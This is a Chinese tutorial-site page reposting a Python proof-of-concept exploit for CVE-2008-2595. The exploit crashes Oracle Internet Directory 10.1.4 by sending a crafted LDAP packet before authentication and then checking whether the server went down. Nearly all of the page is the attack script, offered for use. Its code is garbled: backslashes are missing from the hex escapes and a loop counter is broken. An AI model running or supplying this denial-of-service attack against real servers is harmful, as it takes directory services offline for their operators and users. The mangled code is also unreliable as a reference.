手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
摘要:#!/usr/bin/python"""OracleInternetDirectory10.1.4preauthenticationDeni...

#!/usr/bin/python"""

Oracle Internet Directory 10.1.4 preauthentication Denial Of ServiceNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.

Sometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one

shoot, but even when you only send one packet it will crash.Tested: Win2000 x86, WinXP x86, Win2003 X86_64Vulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)Fixed: Oracle Critical Patch Update July 2008

CVEID: CVE-2008-2595

"""import sys

import time

import sockethealthPacket = "0%x02x01x01c x04x00nx01x02nx01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00"

packet = "x30x0ex02x01x01x60x09x30x01x03x04x02x44x4ex80x00"def checkHealth(hostname, port):

print " --> Wating 5 seconds"

time.sleep

(5)

print " --> Connecting to target..."

socket.setdefaulttimeout

(5)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((hostname, port)) try:

print " --> Sending 'health' packet ..."

s.sendall(healthPacket)

print " --> Trying to receive something..."

data = s.recv(1024)

except:

err = sys.exc_info()[1] if int(err[0]) == 104:

print "[ ] Exploits works!"

return if data != "":

print "[!] Server is up and running :("

else:

print "[?] Server doesn't answer nothing. It works?"def oidDos(hostname, port):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

print "[ ] Connecting to ldap://%s:%d..." % (hostname, port)

s.connect((hostname, int(port))) print "[ ] Sending packet..."

s.sendall(packet)

s.close() print "[ ] Checking OID's health..."

checkHealth(hostname, port)

except:

print sys.exc_info()[1]def usage():

print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"

print "Copyright (c) 2007 Joxean Koret"

print

print "Usage:"

print sys.argv[0],"-h -p"

printdef main():

if len(sys.argv) != 3:

usage()

sys.exit(0)

hostname = None

port = None i = 0

for param in sys.argv:

i = 1

if i == 1:

continue

if param.startswith("-h"):

hostname = param[2:]

elif param.startswith("-p"):

port = int(param[2:])

else:

print "Unknown option '%s'" % param

usage()

sys.exit

(1)

if not hostname or not port:

print "Bad command line."

usage()

sys.exit

(1) oidDos(hostname, port)if __name__ == "__main__":

main()

【Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit】相关文章:

鲁大师硬盘坏道检测方法

怎么样检查电脑是不是有病毒

Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit

DreamNews Manager (id) Remote SQL Injection Vulnerability

黑客总结的实用的网站渗透步骤

Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)

用Dos命令加锁 防止病毒格式化硬盘

gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability

精品推荐
分类导航